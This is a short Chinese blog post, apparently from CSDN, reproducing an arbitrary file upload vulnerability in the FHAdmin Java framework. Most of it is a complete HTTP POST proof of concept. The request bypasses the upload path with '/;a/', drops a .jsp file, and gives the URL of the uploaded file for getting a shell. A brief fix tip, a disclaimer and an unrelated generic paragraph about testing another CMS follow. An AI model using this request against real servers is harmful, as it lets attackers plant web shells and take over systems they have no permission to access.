FHAdmin任意文件上传getShell渗透测试

简介

FHAdmin于2014年发布,由JAVA语言编写,是集成了代码生成、权限管理等基础功能的Java快速开发框架及平台,同时为适应技术的更新的迭代,也推出了更新框架和技术架构后的版本。

漏洞复现

任意文件上传
/;/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/ 存在任意文件上传。

poc

POST //;a/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1
Accept-Encoding: gzip, deflate
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Connection: close
Host: xxxx
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: http://xxxx/fh_static_1/css/style.css
Content-Length: 175
Content-Type: multipart/form-data; boundary=653e1298053b919b8c365d524e9c45b3

--653e1298053b919b8c365d524e9c45b3
Content-Disposition: form-data; name="imgFile"; filename="1.jsp"
Content-Type: image/jpeg

hello
--653e1298053b919b8c365d524e9c45b3--

使用BP检测

最后访问地址是

http://xxx//;a/plugins/uploadify/2021062512120567679.jsp

修复建议

限制访问 升级最新版本

注意:本文仅供学习参考,非法传播及使用产生的后果自行承担,与本文作者无关
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
久草CMS是一款基于PHP开发的网站管理系统,用于构建和管理网站。而"getshell"意指通过系统漏洞或安全弱点成功获取对网站的控制权限。渗透测试指对系统进行安全评估,通过模拟黑客攻击的方式检测和发现系统的潜在安全风险。 首先,要进行久草CMS网站的渗透测试,我们需要确定目标和目的。渗透测试的目的可能是检测系统的安全性,发现潜在的漏洞并提出修复建议,以有效保护网站免受恶意攻击。 其次,我们可以使用一系列渗透测试工具和方法,来检测久草CMS网站的安全性。例如,可以使用漏洞扫描器来寻找系统中已知的漏洞,比如开源软件的已知漏洞或系统配置错误。此外,也可以进行弱口令猜解、文件漏洞测试、SQL注入测试等等,来寻找系统的潜在漏洞和安全弱点。 在进行渗透测试过程中,要求我们具备专业的知识和技能,并遵守相关法律法规和道德规范。渗透测试仅用于合法授权的目的,不能用于非法活动,如未经授权的攻击或破坏性测试。 最后,我们应该向网站管理员或开发者提供渗透测试的结果和建议,以便他们能够修复发现的漏洞和弱点。持续的监测和修复漏洞是确保网站安全的重要环节。 总之,对久草CMS颜色网站进行渗透测试是一项重要的安全评估工作,通过发现系统漏洞和弱点,可以帮助网站管理员和开发者加强对网站的安全性保护,从而保护用户的信息和数据的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值